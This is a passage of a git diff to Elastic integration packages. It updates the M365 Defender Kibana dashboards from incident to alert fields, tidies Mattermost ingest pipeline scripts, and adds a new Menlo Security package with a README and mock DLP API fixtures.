"data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -1574,12 +1598,12 @@ }, { "id": "logs-*", - "name": "bfd73a62-e6c5-4126-9065-f4b17a1e4680", + "name": "c17dcd3a-85d8-4d61-8d7d-a73bf33c9308", "type": "index-pattern" }, { "id": "logs-*", - "name": "108199c0-a675-4fe1-87a9-4599aa85db91", + "name": "960f02f3-c9a1-41c3-89b5-e776d368c13f", "type": "index-pattern" } ], @@ -1599,9 +1623,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "7048d5d3-a8bc-4b71-8b79-e51c6adc0350": { "customLabel": true, @@ -1617,10 +1644,14 @@ }, "orderDirection": "desc", "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 10 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.alert.evidence.user_account.account_name" + "sourceField": "m365_defender.alert.evidence.user_account.account_name" } }, "incompleteColumns": {} @@ -1636,8 +1667,9 @@ "meta": { "alias": null, "disabled": false, - "index": "bfd73a62-e6c5-4126-9065-f4b17a1e4680", - "key": "m365_defender.incident.alert.evidence.roles", + "field": "m365_defender.alert.evidence.roles", + "index": "c17dcd3a-85d8-4d61-8d7d-a73bf33c9308", + "key": "m365_defender.alert.evidence.roles", "negate": false, "params": { "query": "compromised" @@ -1646,7 +1678,7 @@ }, "query": { "match_phrase": { - "m365_defender.incident.alert.evidence.roles": "compromised" + "m365_defender.alert.evidence.roles": "compromised" } } }, @@ -1658,17 +1690,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "108199c0-a675-4fe1-87a9-4599aa85db91", + "index": "960f02f3-c9a1-41c3-89b5-e776d368c13f", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -1725,12 +1757,12 @@ }, { "id": "logs-*", - "name": "eaea7ed4-6b0d-4522-8e92-34b831024614", + "name": "2ad498dd-ec2d-4d0a-9b28-90ec26463540", "type": "index-pattern" }, { "id": "logs-*", - "name": "8d4d1674-3434-45ae-b1f9-83b5c02ea1b3", + "name": "81318fde-26d0-4216-bad5-1f971638821e", "type": "index-pattern" } ], @@ -1769,9 +1801,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" } }, "incompleteColumns": {} @@ -1787,36 +1822,52 @@ "meta": { "alias": null, "disabled": false, - "index": "eaea7ed4-6b0d-4522-8e92-34b831024614", - "key": "m365_defender.incident.alert.evidence.verdict", + "index": "2ad498dd-ec2d-4d0a-9b28-90ec26463540", "negate": false, "params": [ - "malicious", - "suspicious" - ], - "type": "phrases", - "value": [ - "malicious", - "suspicious" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { + { + "meta": { + "alias": null, + "disabled": false, + "field": "m365_defender.alert.evidence.verdict", + "index": "logs-*", + "key": "m365_defender.alert.evidence.verdict", + "negate": false, + "params": { + "query": "malicious" + }, + "type": "phrase" + }, + "query": { "match_phrase": { - "m365_defender.incident.alert.evidence.verdict": "malicious" + "m365_defender.alert.evidence.verdict": "malicious" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "m365_defender.alert.evidence.verdict", + "index": "logs-*", + "key": "m365_defender.alert.evidence.verdict", + "negate": false, + "params": { + "query": "suspicious" + }, + "type": "phrase" }, - { + "query": { "match_phrase": { - "m365_defender.incident.alert.evidence.verdict": "suspicious" + "m365_defender.alert.evidence.verdict": "suspicious" } } - ] - } - } + } + ], + "relation": "OR", + "type": "combined" + }, + "query": {} }, { "$state": { @@ -1826,17 +1877,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "8d4d1674-3434-45ae-b1f9-83b5c02ea1b3", + "index": "81318fde-26d0-4216-bad5-1f971638821e", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -1893,12 +1944,12 @@ }, { "id": "logs-*", - "name": "dd37b426-93bd-4376-8f4d-831cfa0673d8", + "name": "5aaad6ed-4ad5-44ba-8d6f-2835812d4321", "type": "index-pattern" }, { "id": "logs-*", - "name": "5bd954c2-632c-40c9-a72f-47d8ed59a63b", + "name": "fd73d1c0-eb56-41d1-94b0-43976d0ba7d2", "type": "index-pattern" } ], @@ -1937,9 +1988,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" } }, "incompleteColumns": {} @@ -1955,8 +2009,9 @@ "meta": { "alias": null, "disabled": false, - "index": "dd37b426-93bd-4376-8f4d-831cfa0673d8", - "key": "m365_defender.incident.alert.evidence.roles", + "field": "m365_defender.alert.evidence.roles", + "index": "5aaad6ed-4ad5-44ba-8d6f-2835812d4321", + "key": "m365_defender.alert.evidence.roles", "negate": false, "params": { "query": "attacked" @@ -1965,7 +2020,7 @@ }, "query": { "match_phrase": { - "m365_defender.incident.alert.evidence.roles": "attacked" + "m365_defender.alert.evidence.roles": "attacked" } } }, @@ -1977,17 +2032,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "5bd954c2-632c-40c9-a72f-47d8ed59a63b", + "index": "fd73d1c0-eb56-41d1-94b0-43976d0ba7d2", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -2038,7 +2093,7 @@ "enhancements": {} }, "gridData": { - "h": 20, + "h": 15, "i": "b83be89c-7f77-406b-9028-1cfb0eb67e8d", "w": 40, "x": 8, @@ -2055,7 +2110,7 @@ "version": 1 }, "coreMigrationVersion": "8.7.1", - "created_at": "2023-09-04T08:41:26.216Z", + "created_at": "2024-01-22T12:09:27.346Z", "id": "m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03", "migrationVersion": { "dashboard": "8.7.0" @@ -2068,7 +2123,7 @@ }, { "id": "logs-*", - "name": "8ed4553a-d396-4ad7-b247-10e005d65086:4dc6b906-d0f7-4c34-b48b-055f291cfc90", + "name": "8ed4553a-d396-4ad7-b247-10e005d65086:9f120d0d-531c-42be-b1ed-5dc4683d5b15", "type": "index-pattern" }, { @@ -2078,7 +2133,7 @@ }, { "id": "logs-*", - "name": "00c0b388-64b8-49c8-9ccb-de8e58030b4d:2128586b-14fe-4907-84a9-4c193f8a2c5f", + "name": "00c0b388-64b8-49c8-9ccb-de8e58030b4d:a155689d-f319-4f42-831d-2097922e6b7c", "type": "index-pattern" }, { @@ -2088,7 +2143,7 @@ }, { "id": "logs-*", - "name": "8e4019a0-6594-4eaf-9358-c343b72aba84:d7bb4468-3be1-458a-b9e0-bd84db7e308a", + "name": "8e4019a0-6594-4eaf-9358-c343b72aba84:db899305-b961-454c-8390-5d1d2395a3e2", "type": "index-pattern" }, { @@ -2098,7 +2153,7 @@ }, { "id": "logs-*", - "name": "1f836fdc-61f4-4cf4-a392-50276a2b77f1:57b64179-81e7-4d61-b50b-23d21323b9da", + "name": "1f836fdc-61f4-4cf4-a392-50276a2b77f1:d3ac725d-8f46-4c0d-a938-280f91905f74", "type": "index-pattern" }, { @@ -2108,7 +2163,7 @@ }, { "id": "logs-*", - "name": "b5b7f2a4-1d6e-4812-8724-5a771014c3ae:a06ad11b-3d3e-48e1-bb6c-08f62f8b0b58", + "name": "b5b7f2a4-1d6e-4812-8724-5a771014c3ae:f7a464e2-0eb1-4f4a-9d10-a16d8f69348c", "type": "index-pattern" }, { @@ -2118,12 +2173,12 @@ }, { "id": "logs-*", - "name": "6847c21e-2ec0-4af4-aa67-ec52b181b05e:742836c8-3532-4e18-b067-26e3af1b0e3b", + "name": "6847c21e-2ec0-4af4-aa67-ec52b181b05e:39ecb368-ff15-47cd-a634-68075279a23e", "type": "index-pattern" }, { "id": "logs-*", - "name": "6847c21e-2ec0-4af4-aa67-ec52b181b05e:438f3787-c321-45a5-9cca-89571591b016", + "name": "6847c21e-2ec0-4af4-aa67-ec52b181b05e:72677633-892f-44ca-afb3-567a4350bc30", "type": "index-pattern" }, { @@ -2133,7 +2188,7 @@ }, { "id": "logs-*", - "name": "51f47e38-eed6-42b3-8096-a39b914909da:7a5d204e-cb61-4c0d-8923-28afeb2927a2", + "name": "51f47e38-eed6-42b3-8096-a39b914909da:25f2fb8c-9456-418f-aa6a-d5e4037d63c7", "type": "index-pattern" }, { @@ -2143,7 +2198,7 @@ }, { "id": "logs-*", - "name": "62846e2a-f412-4cf9-b8ea-b08bc7fbd613:be5d6d70-2d76-4b3c-bc34-c27a83b81991", + "name": "62846e2a-f412-4cf9-b8ea-b08bc7fbd613:5b859903-4472-47cb-8798-06ff556b7753", "type": "index-pattern" }, { @@ -2153,7 +2208,7 @@ }, { "id": "logs-*", - "name": "efd3aa63-5879-4383-87e4-6276e38b3c01:dbc8860d-394c-46cb-a626-67a20c1862c8", + "name": "efd3aa63-5879-4383-87e4-6276e38b3c01:c9581305-ba3a-4ead-91b7-4535d99f4525", "type": "index-pattern" }, { @@ -2163,7 +2218,7 @@ }, { "id": "logs-*", - "name": "7317b469-4895-497a-a263-14b58eaec52f:75891f9a-3458-40d6-8d3c-63de61fb3f7d", + "name": "7317b469-4895-497a-a263-14b58eaec52f:236c3bc5-5f69-4d41-a5cd-c581f069e57e", "type": "index-pattern" }, { @@ -2173,12 +2228,12 @@ }, { "id": "logs-*", - "name": "d8b78c44-5d93-4a70-9d3d-0386581082d1:bfd73a62-e6c5-4126-9065-f4b17a1e4680", + "name": "d8b78c44-5d93-4a70-9d3d-0386581082d1:c17dcd3a-85d8-4d61-8d7d-a73bf33c9308", "type": "index-pattern" }, { "id": "logs-*", - "name": "d8b78c44-5d93-4a70-9d3d-0386581082d1:108199c0-a675-4fe1-87a9-4599aa85db91", + "name": "d8b78c44-5d93-4a70-9d3d-0386581082d1:960f02f3-c9a1-41c3-89b5-e776d368c13f", "type": "index-pattern" }, { @@ -2188,12 +2243,12 @@ }, { "id": "logs-*", - "name": "34673480-15c2-4f75-ae86-637bc6875e78:eaea7ed4-6b0d-4522-8e92-34b831024614", + "name": "34673480-15c2-4f75-ae86-637bc6875e78:2ad498dd-ec2d-4d0a-9b28-90ec26463540", "type": "index-pattern" }, { "id": "logs-*", - "name": "34673480-15c2-4f75-ae86-637bc6875e78:8d4d1674-3434-45ae-b1f9-83b5c02ea1b3", + "name": "34673480-15c2-4f75-ae86-637bc6875e78:81318fde-26d0-4216-bad5-1f971638821e", "type": "index-pattern" }, { @@ -2203,12 +2258,12 @@ }, { "id": "logs-*", - "name": "664a1613-6c7e-40cd-91b2-43ce6c451ddb:dd37b426-93bd-4376-8f4d-831cfa0673d8", + "name": "664a1613-6c7e-40cd-91b2-43ce6c451ddb:5aaad6ed-4ad5-44ba-8d6f-2835812d4321", "type": "index-pattern" }, { "id": "logs-*", - "name": "664a1613-6c7e-40cd-91b2-43ce6c451ddb:5bd954c2-632c-40c9-a72f-47d8ed59a63b", + "name": "664a1613-6c7e-40cd-91b2-43ce6c451ddb:fd73d1c0-eb56-41d1-94b0-43976d0ba7d2", "type": "index-pattern" }, { @@ -2223,17 +2278,17 @@ }, { "id": "logs-*", - "name": "controlGroup_e61071e0-ba4d-4765-9267-e035395b221f:optionsListDataView", + "name": "controlGroup_ec5d23b5-535c-483a-88ad-279762f3d5ca:optionsListDataView", "type": "index-pattern" }, { "id": "logs-*", - "name": "controlGroup_ec5d23b5-535c-483a-88ad-279762f3d5ca:optionsListDataView", + "name": "controlGroup_cef3df17-225a-4373-a231-caa594cd1bf4:optionsListDataView", "type": "index-pattern" }, { "id": "logs-*", - "name": "controlGroup_cef3df17-225a-4373-a231-caa594cd1bf4:optionsListDataView", + "name": "controlGroup_23cace2f-34ed-4efa-bed4-ccdc7318dfb8:rangeSliderDataView", "type": "index-pattern" } ], diff --git a/packages/m365_defender/kibana/search/m365_defender-989afc60-44a5-11ed-8375-0168a9970c06.json b/packages/m365_defender/kibana/search/m365_defender-989afc60-44a5-11ed-8375-0168a9970c06.json index 1b288286d2f..bbf2717ce1e 100644 --- a/packages/m365_defender/kibana/search/m365_defender-989afc60-44a5-11ed-8375-0168a9970c06.json +++ b/packages/m365_defender/kibana/search/m365_defender-989afc60-44a5-11ed-8375-0168a9970c06.json @@ -1,16 +1,16 @@ { "attributes": { "columns": [ - "m365_defender.incident.alert.title", - "m365_defender.incident.alert.severity", - "m365_defender.incident.alert.id", "event.id", - "m365_defender.incident.alert.status", - "m365_defender.incident.alert.assigned_to" + "m365_defender.alert.title", + "event.severity", + "m365_defender.alert.status", + "source.user.name" ], "description": "", "grid": {}, "hideChart": false, + "isTextBasedQuery": false, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -25,13 +25,13 @@ "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -49,10 +49,12 @@ "desc" ] ], - "title": "Alerts Essential Details [Logs Microsoft 365 Defender]" + "timeRestore": false, + "title": "Alerts Essential Details [Logs Microsoft 365 Defender]", + "usesAdHocDataView": false }, "coreMigrationVersion": "8.7.1", - "created_at": "2023-09-04T07:50:09.615Z", + "created_at": "2024-01-22T11:45:09.140Z", "id": "m365_defender-989afc60-44a5-11ed-8375-0168a9970c06", "migrationVersion": { "search": "8.0.0" diff --git a/packages/m365_defender/kibana/search/m365_defender-fcf25960-44af-11ed-8375-0168a9970c06.json b/packages/m365_defender/kibana/search/m365_defender-fcf25960-44af-11ed-8375-0168a9970c06.json index 826d862b554..69786e318c4 100644 --- a/packages/m365_defender/kibana/search/m365_defender-fcf25960-44af-11ed-8375-0168a9970c06.json +++ b/packages/m365_defender/kibana/search/m365_defender-fcf25960-44af-11ed-8375-0168a9970c06.json @@ -52,7 +52,7 @@ "title": "Incidents Essential Details [Logs Microsoft 365 Defender]" }, "coreMigrationVersion": "8.7.1", - "created_at": "2023-09-04T07:50:09.615Z", + "created_at": "2024-01-22T11:45:09.140Z", "id": "m365_defender-fcf25960-44af-11ed-8375-0168a9970c06", "migrationVersion": { "search": "8.0.0" diff --git a/packages/m365_defender/manifest.yml b/packages/m365_defender/manifest.yml index 794daa83ad5..10900ecf444 100644 --- a/packages/m365_defender/manifest.yml +++ b/packages/m365_defender/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: m365_defender title: Microsoft M365 Defender -version: "2.6.2" +version: "2.8.0" description: Collect logs from Microsoft M365 Defender with Elastic Agent. categories: - "security" @@ -11,7 +11,7 @@ conditions: elastic: subscription: basic kibana: - version: ^8.7.1 + version: ^8.12.0 policy_templates: - name: m365_defender title: M365 Defender Logs @@ -35,6 +35,7 @@ policy_templates: show_user: false default: oauth2/v2.0/token description: "Microsoft supports multiple Oauth2 URL endpoints, the default is oauth2/v2.0/token, but can also be oauth2/token" + secret: false - name: enable_request_tracer type: bool title: Enable request tracing @@ -50,12 +51,13 @@ policy_templates: required: true show_user: true - name: client_secret - type: text + type: password title: Client Secret description: The secret related to the client ID. multi: false required: true show_user: true + secret: true - name: tenant_id type: text title: Tenant ID @@ -108,11 +110,11 @@ icons: size: 32x32 type: image/svg+xml screenshots: - - src: /img/m365-defender-incident-alert1.png - title: Microsoft 365 Defender (Incidents) Alerts Dashboard + - src: /img/m365-defender-alert.png + title: Microsoft 365 Defender Alert Dashboard size: 600x600 type: image/png - - src: /img/m365-defender-incidents-incidents1.png + - src: /img/m365-defender-incidents.png title: Microsoft 365 Defender (Incidents) Incidents Dashboard size: 600x600 type: image/png diff --git a/packages/mattermost/_dev/deploy/docker/sample_logs/audit.log b/packages/mattermost/_dev/deploy/docker/sample_logs/audit.log index 80e2d366a55..6c02a837cf8 100644 --- a/packages/mattermost/_dev/deploy/docker/sample_logs/audit.log +++ b/packages/mattermost/_dev/deploy/docker/sample_logs/audit.log @@ -2,4 +2,4 @@ {"timestamp":"2021-12-04 23:19:48.599 Z","event":"updateConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"172.19.0.1","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} {"timestamp":"2021-12-04 23:19:51.324 Z","event":"Logout","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"172.19.0.1","api_path":"/api/v4/users/logout","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} {"timestamp":"2021-12-04 23:19:58.729 Z","event":"login","status":"success","user_id":"","session_id":"","ip_address":"172.19.0.1","api_path":"/api/v4/users/login","device_id":"","login_id":"admin","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-04 23:20:33.027 Z","event":"patchUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"172.19.0.1","api_path":"/api/v4/users/me/patch","patch":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} \ No newline at end of file +{"timestamp":"2021-12-04 23:20:33.027 Z","event":"patchUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"172.19.0.1","api_path":"/api/v4/users/me/patch","patch":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} diff --git a/packages/mattermost/changelog.yml b/packages/mattermost/changelog.yml index 7b3197f3b96..49508cac48a 100644 --- a/packages/mattermost/changelog.yml +++ b/packages/mattermost/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.18.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9403 +- version: "1.17.3" + changes: + - description: Clean up null handling and Painless scripts + type: bugfix + link: https://github.com/elastic/integrations/pull/9177 - version: "1.17.2" changes: - description: Changed owners diff --git a/packages/mattermost/data_stream/audit/_dev/test/system/test-default-config.yml b/packages/mattermost/data_stream/audit/_dev/test/system/test-default-config.yml index 4752c5f892f..6ad78fdf904 100644 --- a/packages/mattermost/data_stream/audit/_dev/test/system/test-default-config.yml +++ b/packages/mattermost/data_stream/audit/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ data_stream: paths: - "{{SERVICE_LOGS_DIR}}/*.log" preserve_original_event: true +assert: + hit_count: 5 diff --git a/packages/mattermost/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/mattermost/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index eba5ba9e785..13ce825b45c 100644 --- a/packages/mattermost/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/mattermost/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -12,6 +12,9 @@ processors: - json: field: event.original target_field: json + - fail: + if: "!(ctx.json instanceof Map)" + message: Missing JSON object - date: field: json.timestamp formats: @@ -30,7 +33,7 @@ processors: field: json.errors target_field: mattermost.audit.error.message ignore_missing: true - if: ctx.json?.errors != "[]" + if: ctx.json.errors != "[]" - gsub: field: mattermost.audit.error.message pattern: "(\\[|\\])" @@ -44,15 +47,15 @@ processors: - set: field: event.outcome value: success - if: ctx.json?.status == "success" + if: ctx.json.status == "success" - set: field: event.outcome value: failure - if: ctx.json?.status == "fail" || ctx.mattermost?.audit?.error?.message != null + if: ctx.json.status == "fail" || ctx.mattermost?.audit?.error?.message != null - set: field: event.outcome value: unknown - if: ctx.event?.outcome == null + if: ctx.event.outcome == null - rename: field: json.user_id target_field: user.id @@ -308,63 +311,53 @@ processors: - group - change source: >- - ctx.event.kind = 'event'; ctx.event.category = ['configuration']; ctx.event.type = ['info']; if (ctx?.event?.action == null) { - - + ctx.event.kind = 'event'; + ctx.event.category = ['configuration']; + ctx.event.type = ['info']; + if (ctx.event.action == null) { return; - } if (params.get(ctx.event.action) == null) { - - + } + if (params.get(ctx.event.action) == null) { return; - } def hm = new HashMap(params.get(ctx.event.action)); hm.forEach((k, v) -> ctx.event[k] = v); + } + def hm = new HashMap(params.get(ctx.event.action)); + hm.forEach((k, v) -> ctx.event[k] = v); - script: lang: painless description: Add ECS User fields - if: "ctx.event?.category.contains('iam')" + if: ctx.event.category.contains('iam') source: >- - if (ctx?.event?.action == null) { - - + if (ctx.event.action == null) { return; - } if (ctx.group == null) { - - + } + if (ctx.group == null) { Map map = new HashMap(); ctx.put("group", map); - } if (ctx.user == null) { - - + } + if (ctx.user == null) { Map map = new HashMap(); ctx.put("user", map); - } if (ctx.user?.target == null) { - - + } + if (ctx.user.target == null) { Map map = new HashMap(); ctx.user.put("target", map); - } if (ctx.user?.changes == null) { - - + } + if (ctx.user.changes == null) { Map map = new HashMap(); ctx.user.put("changes", map); - } if (ctx.user?.target?.group == null) { - - + } + if (ctx.user.target.group == null) { Map map = new HashMap(); ctx.user.target.put("group", map); - } if(['patchUser'].contains(ctx.event.action)) { - - - if(ctx.user?.target?.name != ctx.mattermost?.audit?.patch?.name) { + } + if (['patchUser'].contains(ctx.event.action)) { + if(ctx.user.target.name != ctx.mattermost?.audit?.patch?.name) { ctx.user.changes.put("name", ctx.mattermost?.audit?.patch?.name); } - } if(['createTeam','patchTeam','deleteTeam'].contains(ctx.event.action)) { - - + } else if (['createTeam','patchTeam','deleteTeam'].contains(ctx.event.action)) { ctx.group.put("name", ctx.mattermost?.audit?.team?.name); ctx.group.put("id", ctx.mattermost?.audit?.team?.id); - } if(['addTeamMembers','removeTeamMember'].contains(ctx.event.action)) { - - + } else if (['addTeamMembers','removeTeamMember'].contains(ctx.event.action)) { ctx.user.target.group.put("name", ctx.mattermost?.audit?.team?.name); ctx.user.target.group.put("id", ctx.mattermost?.audit?.team?.id); } @@ -387,7 +380,7 @@ processors: field: related.user value: '{{user.target.id}}' allow_duplicates: false - if: ctx.user?.target?.id != null && ctx.user.target.id instanceof String + if: ctx.user?.target?.id instanceof String - foreach: field: user.target.id processor: @@ -396,7 +389,7 @@ processors: value: '{{_ingest._value}}' allow_duplicates: false ignore_missing: true - if: ctx.user?.target?.id != null && ctx.user.target.id instanceof List + if: ctx.user?.target?.id instanceof List - append: field: related.ip value: '{{source.ip}}' @@ -423,7 +416,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - script: diff --git a/packages/mattermost/manifest.yml b/packages/mattermost/manifest.yml index 46bf799973e..d2ba2cade86 100644 --- a/packages/mattermost/manifest.yml +++ b/packages/mattermost/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: mattermost title: "Mattermost" -version: "1.17.2" +version: "1.18.0" description: Collect logs from Mattermost with Elastic Agent. type: integration categories: diff --git a/packages/menlo/_dev/build/build.yml b/packages/menlo/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/menlo/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" diff --git a/packages/menlo/_dev/build/docs/README.md b/packages/menlo/_dev/build/docs/README.md new file mode 100644 index 00000000000..a6e7b688556 --- /dev/null +++ b/packages/menlo/_dev/build/docs/README.md @@ -0,0 +1,52 @@ +# Menlo Security + +Menlo Security’s isolation-centric approach splits web browsing and document retrieval between the user’s device and an isolated, Disposable Virtual Container (DVC) away from the endpoint. All risky code is executed in the isolated DVC and never reaches the endpoint. Only safe display data is sent to the user’s browser. User traffic is automatically sent to this infrastructure without any impact on the users themselves. + +## Web + +Menlo Security's cloud based Browser Security prevents phishing and malware attacks on any browser and any device across your hybrid enterprise. + +## DLP + +Data Loss Prevention (also known as Data Leak Prevention) detects potential data breaches or data ex-filtration transmissions and prevents them by detecting and optionally blocking sensitive data passing through the Menlo Security platform. + +## Compatibility + +This module has been tested against the Menlo Security API **version 2.0** + +## Data streams + +The Menlo Security integration collects data for the following two events: + +| Event Type | +|-------------------------------| +| Web | +| DLP | + +## Setup + +To collect data through the REST API you will need your Menlo Security API URL and an API token. + +The API token to collect logs must have the *Log Export API* permission + +## Logs Reference + +### Web + +This is the `Web` dataset. + +#### Example + +{{ event "web" }} + +{{ fields "web" }} + +### DLP + +This is the `DLP` dataset. + +#### Example + +{{ event "dlp" }} + +{{ fields "dlp" }} diff --git a/packages/menlo/_dev/deploy/docker/config.yml b/packages/menlo/_dev/deploy/docker/config.yml new file mode 100644 index 00000000000..16e171cb46e --- /dev/null +++ b/packages/menlo/_dev/deploy/docker/config.yml @@ -0,0 +1,430 @@ +rules: + - path: "/api/rep/v1/fetch/client_select" + methods: [POST] + request_body: '{"log_type":"dlp","pagingIdentifiers":{},"token":"xxxx"}' + query_params: + limit: 2 + format: "json" + start: "{start:.*}" + end: "{end:.*}" + responses: + - status_code: 200 + body: | + [ + { + "timestamp": "2023-11-21T13:12:37.102Z", + "result": { + "pagingIdentifiers": { + "next_time": "2023-11-21T13:12:44.384Z", + "hashes": { + "2d2a6dcedb5dbc122c36e4ec980410c6": 0 + } + }, + "events": [ + { + "event": { + "dst_url": "http://tinynewupload.com/", + "user_input": "false", + "protocol": "http", + "file_type": "CSV", + "domain": "tinynewupload.com", + "alerted": "false", + "ccl_ids": "CreditordebitcardnumbersGlobal", + "severity": "5", + "event_time": "2020-03-09T17:17:22.227000", + "event_id": "a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "filename": "more_credit_cards.csv", + "version": "2.0", + "sha256": "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a", + "status": "dirty", + "product": "MSIP", + "ccl_match_counts": "1", + "vendor": "Menlo Security", + "ccl_scores": "1", + "rule_name": "Credit card block rule", + "request_type": "GET", + "src_url": "http://tinynewupload.com/", + "categories": "Download Sites", + "stream_name": "/safefile-input/working_file", + "name": "file_upload", + "userid": "admin@menlosecurity.com", + "action": "block", + "rule_id": "1f3ef32c-ec62-42fb-8cad-e1fee3375099" + } + }, + { + "event": { + "dst_url": "http://tinynewupload.com/", + "user_input": "false", + "protocol": "http", + "file_type": "CSV", + "domain": "tinynewupload.com", + "alerted": "false", + "ccl_ids": "CreditordebitcardnumbersGlobal", + "severity": "5", + "event_time": "2020-03-09T17:19:22.227000", + "event_id": "a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "filename": "phone_numbers.csv", + "version": "2.0", + "sha256": "fd1aee671d92ab30f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a", + "status": "dirty", + "product": "MSIP", + "ccl_match_counts": "1", + "vendor": "Menlo Security", + "ccl_scores": "1", + "rule_name": "Phone number block rule", + "request_type": "GET", + "src_url": "http://tinynewupload.com/", + "categories": "Download Sites", + "stream_name": "/safefile-input/working_file", + "name": "file_upload", + "userid": "admin@menlosecurity.com", + "action": "block", + "rule_id": "1f3ef32c-ec62-42fb-8cad-e1fe13375099" + } + } + ] + } + } + ] + - path: "/api/rep/v1/fetch/client_select" + methods: [POST] + request_body: '{"log_type":"dlp","pagingIdentifiers":{"hashes":{"2d2a6dcedb5dbc122c36e4ec980410c6":0},"next_time":"2023-11-21T13:12:44.384Z"},"token":"xxxx"}' + query_params: + limit: 2 + format: "json" + start: "{start:.*}" + end: "{end:.*}" + responses: + - status_code: 200 + body: | + [ + { + "timestamp": "2023-11-21T13:12:37.102Z", + "result": { + "pagingIdentifiers": { + "next_time": "2023-11-21T19:12:44.384Z", + "hashes": { + "2d2a6dcedb5dbc122c36e4ec980410c6": 0 + }, + "last_iteration": true + 